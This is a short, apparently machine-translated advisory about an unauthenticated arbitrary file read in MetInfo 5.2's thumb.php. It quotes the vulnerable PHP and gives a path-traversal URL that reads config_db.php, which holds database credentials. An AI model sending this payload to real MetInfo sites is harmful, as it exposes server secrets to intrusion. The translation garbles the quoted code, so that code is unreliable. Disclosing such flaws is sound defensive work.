Read any file of the latest MetInfo version
Attackers can obtain Arbitrary File Content on the server by submitting specially crafted parameters!
The include/thumb. php file of MetInfo 5.2 (the latest version) is used to obtain thumbnails. However, the thumbnail path constructed by MetInfo has external controllable variables. Attackers can obtain Arbitrary File Content:
The key code for include/thumb. php is as follows:
$ Ext1 = explode ("/", $ dir); // $ dir variable is passed in externally $ count = count ($ ext1 ); $ count1 = $ ext1 [$ count-1]; $ ext2 = explode (". ", $ count1); $ ext3 = $ ext2 [1]; // $ ext3 is the $ dir variable file name suffix $ path1 = $ ext2 [0]; // $ ext3 is the name of the $ dir variable File $ dir1 = '.. /upload/thumb_src /'. $ x. '_'. $ y. '/'. $ path1 .'. '. $ ext3; // $ x and $ y are passed in from outside, so the entire $ dir1 variable is fully controllable if (file_exists ($ dir1 )) {// the logic reads the content of the $ dir1 file echo "the file exist :". $ dir1; readfile ("$ dir1");} else {$ f = new upfil E (); $ imgurls = $ f-> createthumb ($ dir, $ x, $ y); readfile ($ imgurls) ;}?>
Attackers can use the following highly-targeted urls:
Include/thumb. php? X = 1 & y =/.../../config & dir = config_db.php
Then you can see the config_db.php code in the browser source code:
This vulnerability does not require logon or any permissions !!!
Solution:
Handle related logic!